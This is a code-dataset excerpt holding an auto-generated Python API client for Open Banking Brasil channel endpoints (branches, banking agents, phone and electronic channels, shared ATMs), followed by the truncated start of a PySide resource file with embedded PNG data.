"MIT"
] | null | null | null |
channels_client/api/channels_api.py
|
pitzer42/opbk-br-quickstart
|
b3f86b2e5f82a6090aaefb563614e174a452383c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
APIs OpenData do Open Banking Brasil
As APIs descritas neste documento são referentes as APIs da fase OpenData do Open Banking Brasil. # noqa: E501
OpenAPI spec version: 1.0.0-rc5.2
Contact: apiteam@swagger.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from channels_client.api_client import ApiClient
class ChannelsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper.

    :param api_client: optional pre-configured ApiClient; when omitted a
        default-constructed ApiClient is used.
    """
    self.api_client = ApiClient() if api_client is None else api_client
def get_banking_agents(self, **kwargs):  # noqa: E501
    """List the institution's banking agents (correspondentes bancarios).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_banking_agents(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseBankingAgentsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always returns just the payload; both the
    # sync and async paths simply forward the helper's result.
    kwargs['_return_http_data_only'] = True
    return self.get_banking_agents_with_http_info(**kwargs)  # noqa: E501
def get_banking_agents_with_http_info(self, **kwargs):  # noqa: E501
    """List the institution's banking agents (correspondentes bancarios).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_banking_agents_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseBankingAgentsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may legally pass.
    all_params = [
        'page',
        'page_size',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Validate kwargs and promote them into the params mapping.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_banking_agents" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}
    path_params = {}

    # Optional paging parameters; note the wire name 'page-size'.
    query_params = []
    for py_name, wire_name in (('page', 'page'), ('page_size', 'page-size')):
        if py_name in params:
            query_params.append((wire_name, params[py_name]))  # noqa: E501

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/banking-agents', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ResponseBankingAgentsList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_branches(self, **kwargs):  # noqa: E501
    """List the institution's own branches (dependencias proprias).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_branches(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseBranchesList
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always returns just the payload; both the
    # sync and async paths simply forward the helper's result.
    kwargs['_return_http_data_only'] = True
    return self.get_branches_with_http_info(**kwargs)  # noqa: E501
def get_branches_with_http_info(self, **kwargs):  # noqa: E501
    """List the institution's own branches (dependencias proprias).  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_branches_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseBranchesList
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may legally pass.
    all_params = [
        'page',
        'page_size',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Validate kwargs and promote them into the params mapping.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_branches" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}
    path_params = {}

    # Optional paging parameters; note the wire name 'page-size'.
    query_params = []
    for py_name, wire_name in (('page', 'page'), ('page_size', 'page-size')):
        if py_name in params:
            query_params.append((wire_name, params[py_name]))  # noqa: E501

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/branches', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ResponseBranchesList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_electronic_channels(self, **kwargs):  # noqa: E501
    """List the institution's electronic service channels.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_electronic_channels(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseElectronicChannelsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always returns just the payload; both the
    # sync and async paths simply forward the helper's result.
    kwargs['_return_http_data_only'] = True
    return self.get_electronic_channels_with_http_info(**kwargs)  # noqa: E501
def get_electronic_channels_with_http_info(self, **kwargs):  # noqa: E501
    """List the institution's electronic service channels.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_electronic_channels_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseElectronicChannelsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may legally pass.
    all_params = [
        'page',
        'page_size',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Validate kwargs and promote them into the params mapping.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_electronic_channels" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}
    path_params = {}

    # Optional paging parameters; note the wire name 'page-size'.
    query_params = []
    for py_name, wire_name in (('page', 'page'), ('page_size', 'page-size')):
        if py_name in params:
            query_params.append((wire_name, params[py_name]))  # noqa: E501

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/electronic-channels', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ResponseElectronicChannelsList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_phone_channels(self, **kwargs):  # noqa: E501
    """List the institution's telephone service channels.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_phone_channels(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponsePhoneChannelsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always returns just the payload; both the
    # sync and async paths simply forward the helper's result.
    kwargs['_return_http_data_only'] = True
    return self.get_phone_channels_with_http_info(**kwargs)  # noqa: E501
def get_phone_channels_with_http_info(self, **kwargs):  # noqa: E501
    """List the institution's telephone service channels.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_phone_channels_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponsePhoneChannelsList
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may legally pass.
    all_params = [
        'page',
        'page_size',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]  # noqa: E501

    # Validate kwargs and promote them into the params mapping.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_phone_channels" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}
    path_params = {}

    # Optional paging parameters; note the wire name 'page-size'.
    query_params = []
    for py_name, wire_name in (('page', 'page'), ('page_size', 'page-size')):
        if py_name in params:
            query_params.append((wire_name, params[py_name]))  # noqa: E501

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/phone-channels', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ResponsePhoneChannelsList',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_shared_automated_teller_machines(self, **kwargs):  # noqa: E501
    """List the shared self-service (ATM) terminals.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_shared_automated_teller_machines(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: number of the page being requested (the first page is 1).
    :param int page_size: total number of records per page.
    :return: ResponseSharedAutomatedTellerMachinesList
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always returns just the payload; both the
    # sync and async paths simply forward the helper's result.
    kwargs['_return_http_data_only'] = True
    return self.get_shared_automated_teller_machines_with_http_info(**kwargs)  # noqa: E501
def get_shared_automated_teller_machines_with_http_info(self, **kwargs):  # noqa: E501
    """Fetch the institution's list of shared ATMs, with HTTP info.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_shared_automated_teller_machines_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page: Page number being requested (the first page is 1).
    :param int page_size: Total number of records per page.
    :return: ResponseSharedAutomatedTellerMachinesList
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted = ('page', 'page_size', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_shared_automated_teller_machines" % key
            )
    params = dict(kwargs)

    # Optional paging arguments map onto the API's query-string names.
    query_params = []
    if 'page' in params:
        query_params.append(('page', params['page']))  # noqa: E501
    if 'page_size' in params:
        query_params.append(('page-size', params['page_size']))  # noqa: E501

    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # This endpoint takes no path, body, or form parameters and needs no
    # authentication.
    return self.api_client.call_api(
        '/shared-automated-teller-machines', 'GET',
        {},
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ResponseSharedAutomatedTellerMachinesList',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 40.777996
| 121
| 0.628348
| 2,408
| 20,756
| 5.188538
| 0.081395
| 0.045462
| 0.022411
| 0.028814
| 0.940211
| 0.932928
| 0.928366
| 0.922283
| 0.919962
| 0.918681
| 0
| 0.01586
| 0.289169
| 20,756
| 508
| 122
| 40.858268
| 0.830961
| 0.401571
| 0
| 0.814394
| 0
| 0
| 0.161162
| 0.048083
| 0
| 0
| 0
| 0.019685
| 0
| 1
| 0.041667
| false
| 0
| 0.015152
| 0
| 0.117424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bd6713e63fcb0649ac53bc667d0da5111e2d0369
| 14,964
|
py
|
Python
|
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | null | null | null |
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | null | null | null |
install/app_store/tk-framework-qtwidgets/v2.6.5/python/overlay_widget/ui/resources_rc.py
|
JoanAzpeitia/lp_sg
|
e0ee79555e419dd2ae3a5f31e5515b3f40b22a62
|
[
"MIT"
] | 1
|
2020-02-15T10:42:56.000Z
|
2020-02-15T10:42:56.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from tank.platform.qt import QtCore
qt_resource_data = "\x00\x00\x12\xea\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00<\x00\x00\x00 \x08\x06\x00\x00\x00N\xe8\x1b\x92\x00\x00\x03\xe8iCCPicc\x00\x008\x8d\x8dU\xddo\xdbT\x14?\x89o\x5c\xa4\x16?\xa0\xb1\x8e\x0e\x15\x8b\xafUS[\xb9\x1b\x1a\xad\xc6\x06I\x93\xa5\xe9B\x1a\xb9\xcd\xd8*\xa4\xc9un\x1aS\xd76\xb6\xd3mU\x9f\xf6\x02o\x0c\xf8\x03\x80\xb2\x07\x1e\x90xB\x1a\x0c\xc4\xf6\xb2\xed\x01\xb4ISA\x15\xd5$\xa4=t\xda@h\x93\xf6\x82\xaap\xae\xafS\xbb]\xc6\xb8\x91\xaf\x7f9\xe7w>\xef\xd15@\xc7W\x9a\xe3\x98I\x19`\xde\xf2]5\x9f\x91\x8f\x9f\x98\x96;V!\x09\xcfA'\xf4@\xa7\xa6{N\xba\x5c.\x02.\xc6\x85G\xd6\xc3_!\xc1\xde7\x07\xda\xeb\xffsuV\xa9\xa7\x03$\x9eBlW=}\x1e\xf1i\x80\x94\xa9;\xae\x0f \xdeF\xf9\xf0)\xdfA\xdc\xf1<\xe2\x1d.&\x88Xax\x96\xe3,\xc33\x1c\x1f\x0f8S\xea(b\x96\x8b\xa4\xd7\xb5*\xe2%\xc4\xfd31\xf9l\x0c\xf3\x1c\x82\xb5#O-\xea\x1a\xba\xcczQv\xed\x9aa\xd2X\xbaOP\xff\xcf5o6Z\xf1z\xf1\xe9\xf2\xe6&\x8f\xe2\xbb\x8f\xd5^w\xc7\xd4\x10\x7f\xaek\xb9I\xc4/#\xbe\xe6\xf8\x19&\x7f\x15\xf1\xbd\xc6\x5c%\x8dx/@\xf2\x99\x9a{\xa4\xc2\xf9\xc97\x16\xebS\xef \xde\x89\xb8j\xf8\x85\xa9P\xbeh\xcd\x94&\xb8mry\xce>\xaa\x86\x9ck\xba7\x8a=\x83\x17\x11\xdf\xaa\xd3B\x91\xe7#@\x95fs\xac_\x88{\xeb\x8d\xb1\xd0\xbf0\xee-L\xe6Z~\x16\xeb\xa3%\xeeGp\xdf\xd3\xc6\xcb\x88{\x10\x7f\xe8\xda\xea\x04\xcfYX\xa6f^\xe5\xfe\x85+\x8e_\x0es\x10\xd6-\xb3T\xe4>\x89D\xbd\xa0\xc6@\xee\xd7\xa7\xc6\xb8-9\xe0\xe3!r[2]3\x8e\x14B\xfe\x92c\x06\xb3\x88\xb9\x91\xf3nC\xad\x84\x9c\x1b\x9a\x9b\xcbs?\xe4>\xb5*\xa1\xcf\xd4\xae\xaa\x96e\xbd\x1dD|\x18\x8e%4\xa0`\xc3\x0c\xee:X\xb0\x012\xa8\x90\x87\x0c\xbe\x1dpQS\x03\x03L\x94P\xd4R\x94\x18\x89\xa7a\x0ee\xedy\xe5\x80\xc3q\xc4\x98\x0d\xac\xd7\x995Fi\xcf\xe1\x11\xee\x84\x1c\x9bt\x13\x85\xec\xc7\xe7 
)\x92Cd\x98\x8c\x80L\xde$o\x91\xc3$\x8b\xd2\x11rp\xd3\xb6\x1c\x8b\xcfb\xdd\xd9\xf4\xf3>4\xd0+\xe3\x1d\x83\xcc\xb9\x9eF_\x14\xef\xac{\xd2\xd0\xaf\x7f\xf4\xf7\x16k\xfb\x91\x9ci+\x9fx\x07\xc0\xc3\x0e\xb4\x98\x03\xf1\xfa\xaf.\xfd\xb0+\xf2\xb1B.\xbc{\xb3\xeb\xea\x12L<\xa9\xbf\xa9\xdb\xa9\xf5\xd4\x0a\xee\xab\xa9\xb5\x88\x91\xfa=\xb5\x86\xbfUHcnf\x90\xd1<>F\x90\x87\x17\xcb ^\xc3e||\xd0p\xff\x03yv\x8c\xb7%b\xcd:\xd7\x13iX'\xe8\x07\xa5\x87%8\xdb\x1fI\x95\xdf\x94?\x95\x15\xe5\x0b\xe5\xbcrw[\x97\xdbvI\xf8T\xf8V\xf8Q\xf8N\xf8^\xf8\x19d\xe1\x92pY\xf8I\xb8\x22|#\x5c\x8c\x9d\xd5\xe3\xe7c\xf3\xec\x83z[\xd52M\xbb^S0\xa5\x8c\xb4[zI\xcaJ/H\xafH\xc5\xc8\x9f\xd4-\x0dIc\xd2\x1e\xd4\xec\xde<\xb7x\xbcx-\x06\x9c\xc0\xbd\xd5\xd5\xf6\xb18\xaf\x82Z\x03N\x05\x15xA\x87-8\xb3m\xfeCk\xd2K\x86Ha\xdb\xd4\x0e\xb3Yn1\xc4\x9c\x98\x15\xd3 \x8b{\xc5\x11qH\x1cg\xb8\x95\x9f\xb8\x07u#\xb8\xe7\xb6L\x9d\xfe\x98\x0ah\x8c\x15\xafs \x98:6\xab\xccz!\xd0y@}z\xdag\x17\xed\xa8\xed\x9cq\x8d\xd9\xba/\xefS\x94\xd7\xe54~\xaa\xa8\x5c\xb0\xf4\xc1~Y3M9Py\xb2K=\xea.\xd0\xea \xb0\xef \xbf\xa2\x1f\xa8\xc1\xf7-\xb1\xf3z$\xf3\xdf\x068\xf4\x17\xdeY7\x22\xd9t\x03\xe0k\x0f\xa0\xfb\xb5H\xd6\x87w\xe2\xb3\x9f\x01\x5c8\xa07\xdc\x85\xf0\xceO$~\x01\xf0j\xfb\xf7\xf1\x7f]\x19\xbc\x9bn5\x9b\x0f\xf0\xbe\xea\xf8\x04`\xe3\xe3f\xf3\x9f\xe5fs\xe3K\xf4\xbf\x06p\xc9\xfc\x17Y\x00qx\x94\x0a\xbf*\x00\x00\x00 cHRM\x00\x00z&\x00\x00\x80\x84\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00u0\x00\x00\xea`\x00\x00:\x98\x00\x00\x17p\x9c\xbaQ<\x00\x00\x00\x06bKGD\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\x00\x09pHYs\x00\x00\x0b\x13\x00\x00\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x04\xadzTXtRaw profile type icc\x00\x00H\x89\x9dWk\xd2\xa4 
\x0c\xfc\xcf)\xf6\x08<\x92\x80\xc7Q\xc0\xaa\xbd\xff\x05\xb6\xc3\xc3\xd1\x19\xddog\xad\xa2P\x08\x1d\xd2\x09!\x9a\xdf9\x9b_x\xdc\x22\xd6X}\xe2\x9a\xc4E\x1b\xadd\xeb}\x1b\x92\x225R\xf4\xec)\x12\xc68\xf1\xc2+\xe6bY0\x8d\x17\xa7\xfd\x86~\xd5\xde\x88\x93\x10C\xb4\xe4\xd8\xb2\xa5l\xc7s\x00\xff\xc3\xb3C\xab\xee\xc8\xcd\x81\x12|\xf9\x06\xe0\xfc\x98/\xe57!\xe1\x18$\xb4/gS\x1f\x96\xdd\x08\xe9\xb0\x94>\x11\xfb\x04K\x86\xc16\xfaH]\xae\xf6\xde\x86\x14#\x98\xb3c<\xba\xb1sG\x06t6\x1a\xfbD\xb0sB\xe2y\x9c\xe8\x18\xbf\xc8s:\x03\x11<\xd3\x11\xe2\xc1M\xc5.\xe1I\x19\x9a\xe3\x18\xf7Y\x1e\xe4\x0d4\xdf\x03\x9d\xb98\x1eG\x14\x85\xa5b\xce\xcb\x22\x01a1\xc2\xc30\x98\x90]\x04\xc3Y\xf8\x9e\xe1\xe7\xe5\xaf\xd5\xe6y\xf9w\xcf\x8f\xeeG\xac\xe5\xc8\x1f&\xd6\xf1\x92a\xfe\xc6\x81\xb6\x01\xe4;\xfbp\xbf\xa4\xe8)\xb1\xbf\x8e\xaf\x16\xe4;b\x1e\x80\xbe;\xc1\xe5\xa4\xa1@8H\x13H\x86\x22\xd5\xbe1\xd3\x88v\xdf\xdd\xec\x9d\x17\x81\x02a\xbe(\xf0!\xc7U\x12\xdc\x15\x07\x90\x93\x81G\xb2@\xc3\xc2t]\x00\xf1*\x9e*\xed\x17\xc5~\xf5\xb2\xc9N\xdb\xb1\xa3\x09\x94\x93\x1ea\x0a#\xe0f*\xf0\xa5\x22\xaa\x98\x96y\xa8\x07G0T\xc3\x84\x88x\x9a\xd6\x05\x82\xc3\x02\x04Vz3!\xd0\x8a\x0c! 
u\x8e\x1f;R\xd3(P\xbd\xee( *V\x90\xba\xce\x88p}g!%\x8d\x17D\xcf4\xad\x9b\x1e`\x1a\xce%\xc5\x17\xd9\xdd\x84\x90E\xbd\x80\xbct\xe5\x22\xd4\x04\x8e28\x9aG\xa5\xef\x94\xac\x06iPo\x9a\xf7\x05\x91\xd4\x0b\x94.\x9a)H\xcb\x96t\x84E\xef\x89W\x8dj\x12Z\xaeqD1kR{e\xca\xc1\x1d\xad\x80\x89\xcc\xfe\xe0n\x00\x15\xcd\xa4\x9e\x98\xe2uG\xb4\xab\xcd\x95_\x81\xd7\xc7\xd9%x\x07G\x8e\xb61\xde\xbd\xc6\xa1j\xf2\x02\xc5\x0e@z\xd6\x04\x9c\x88\x1f\xef\xeaT\x08\xec\xa5\xe5x\xab\xe6 \x97Y\xf2\xfd;j\xf3c\x0d\x14\x09.\x01\xc9\xa6\x0b5\x80\xda\xfb&\xb4 \x8d\x02H\xb6.\xf83\xa0\x99\x88\x10\xb4' y\x8d\xdf\x81\xc8IyM\xbaf\x02\x85\xef\x80\xceV\xd4\xe5\x0d\x08[$\xdcE\x9a,)\x84\xd1o\x96\xe0A\x0a\x05-\xa1u3)@\x96\xb4\xaf\xe8IeM\x9b\xd4\x05\x1f\x9a\xf9\x96\xd4\x97i\xba\x93\x8f\x1dE\xa7WB\xdf\xee\x04\x84[\x01\x08\xd6W\x9c\x80tgb\xf2\x08\xd2]\x93o\xdeM\xda\xf54<i\xd7\xef\x9f\xc8\xee\xbc^9z\x0a\x85v\xe1\xc9\x8d\xf9\xbe\xcc00\xef\xbb\xc8\xb8\xc3\xb6\xecnM)8;[\xe2\x5c\x82mr\xb6\x1d\xee\x1e\xc8\xe6\x7f#\xd92\xaeqF\x0c1\xe0\xf1n\xf0\xb2\xa0\xdd\xc7\x0b\x97\xad\xcd\xf5\x06\x00\xcd\xe5\x8d\xbb|\xe2\xa9\xcc\x1d-'N\xc2=\x0fO\xce\xc8\x038\x92\x02\x8d\x8f\xea\x06\xe0\xfe\x00\xf8h&rR5KK\xa7\x9f\x8b4644\x84\x91\xeb\xea.\x04\x15\xc9\xfb[\x0a\x82-\xd1\x04[\xe1\x84\x82\x04\xb4:4\x04{\xdd\xfe\x1e\xd5\xf71e>c\x06^\x0c\x0b\xda\xc6h\x05mA[\x91\xcf;P\xc8\xda\x1c\xc6v\xcd\xf1\xb8\x00\xd0oze\xdf\x9d\xb1\xef\xd3\x89\x99\x87\xee-\xc2\xa7\x9b/.~E\xfd\xa7g\xcd\x83'\xb8\x01U\x08U\xb7\xd9\xeaA\x1d\xd2Eu;\xde\xd9\xb6k\xe9\x0a\xd6M\xab\xc8C58\x08$\x08\xc6\xb1h\xfb<{O&\xb2\xd6G\xb7\xa7\x1e=\xcfw\xbe\x06\xedw\xa6\x9d\x01\xe7\x8e\x94\xcb\xf8rD\xcb\x08\x93K%;.\x7f=\x9c\xef\xda\x09\x95\x08\x81\x06\x14?\xe7\xf4kn\xf2o:r\xf5;\x88\xa0,\x10\xc8\x88zUuz-\xe5\x164\x5c\x90B\xeb1\xf1N\xa2\x80\xf8\xb6P\x85\xdb;?%\xbf\x91\x8f\xee=\xf1\xe0\x88[\xb0ye\xdf\xb9\xb5\xd8\xe3\x1a\x9f\xa9\xf6H\xbd\xf2Z\xd7\xe6\xd8D\xad\xf0\xd3\xf8I\xe9\x15\xcc\x8e\x1aii\xa5yD\xfd\x06\xcc\x80x\x0cZ\x85\xb5\x8bO\xeb\x15\x81FZP3\x05_}\x06yN\x0bv\xbc\xbc\x96\xc5\xd0\xbe\xf4\xf7\x01
u~\x14T'\xa4\xb5\xc7\xf1\x07yz\xf6\xd0\xea\xa5V\x01\xb7\x1f?'y\xbf\x13D}\xdb~\xbfB\xa9\xa3\xf8,\xb7\x80\x8c\x9b\xaf\xd5Gk\xee\xffWN\xab\xb8\x1bA\x9fz-\xe9xi%\xe1\x96\x82\xa0\xfam;\x9e2\xf3\x17\xc2\xa1\x8ao\xda\xa3\xca\x84pFr6S\xff\xe6Rw}\xc2(\xc0\xe2\xd2\xc6\xf7\xb28\xd3&\xb6\xd5\xb7\xbe\xaca\x98\xd0J\xbe\xac\x05\xd4\x1f\xd7\xb5G\xdd\x00\xd6\xee\xb4\x00\x00\x09OIDATX\xc3\xadY\x7fp\x5cU\x15\xfe\xbe\xfb\xde\xbe\xa4m\xd2$\x0di(U\xdbBa\xe8$\xfc\xb0\x13\xec\x88c\xbao7KKD\xd4\x01V\x07g\x18\x81\xc1\xd1\x19\x11Etd:c\xa6\x8c\x83:\xfc\xe1\xf0\xeb\x9f\xe2\xa08:jD\x07['-i\x92\xcd\x84\x16\x01K\xa9\x94\x82\x96b\xb5\xc4&%\xdd\x96\xfe\x08I6\xef\xdd\xcf?v\xb7lC\xf6G\xda\x9e\x997\x9b\xec\xbb\xf7\x9c\xf3\x9ds\xef9\xdf\xbdKI\xa8DH2\x1a\x8d6\xba\xae\xdbd\xadm\x92T\x03\x80\x00\x5c\x92\x19I4\xc6\x9c\x02\x90v\x1c\xe7h]]]\xba\xbb\xbb;\xacH\xf9\x1c$\x1e\x8f/\x05\xd0\x22i\x1d\xc9\x1b\x01\xac*x=\x05i\x8f\x80\xe7\x8d1;\x8c1\xfbz{{\x0f\x9f\x85\xa3\x14\xe0\xb6\xb6\xb6\xc8\xc2\x85\x0b\xdbI\xde\x04\xe9\xd3 \x97\x03\xa8\x03P\xcdl\x14\xb2\x03s:\x947\x0a\x9c\xa2\xf4\x1f\x91/Iz6\x95J\x0d\xa9\xd2\xc8\xce\x22\x89D\xa2\xceZ{3\x80\xaf\x00XC\xa0\x11$fSy\xc6/\x09\x02\xd2\x00vKz\xceu\xdd\xe7z{{\x0f\x17\x05\x1c\x8f\xc7?\x0f`\x03\x805\xcc\x01\x9b\x8b\xcf\xf99\x00\xac\xa4\xe7%=800\xf0\x8f\xb9\x00M&\x93^:\x9d\xbe\x9b\xe4w\x00\x5c1W\x1f\x0a\xfd\x90t\x04\xc0\xd6\x8f\x00nmm\xf5\x9a\x9b\x9b\x1f\x06p?I\x9eGb\xce6*\xa5\xadt\xf7\xc0\xc0\xc0_*\x99\xb3v\xed\xdaU\xae\xeb>A2v.@\x8b\xf9q\x16\xa0d2\xe9\x1d;v\xecq\x00_\xbf\x10\x06>b\x108m\xa5/\xa7R\xa9\xad\xc5\x96\xb8\xef\xfb\xae1\xe6F\x00\x9bH^|\xa1\xfd0\x85\xff\xa4\xd3\xe9\xdb+\x05K $\x19\x90\x0cpf\xfb\x96\x9dTC\xf2\xd1D\x22\xb1d\xd6\xd7\xa4\x01\xb0\x1e\xc03\x04.8X\x00p\xf3\x7f\xf8\xbe_c\xc8\xef\x95\xf5\x99\xb4\x92\xc6@\xee\x91t\x1c@5\x80\xcb\x01\x5c\x0a`^\xa9\xb9\x12@re\x10\x04\xf7\x91\xfc\xe1\xcc,G\xa3\xd1\xab\x8d1\xbf 
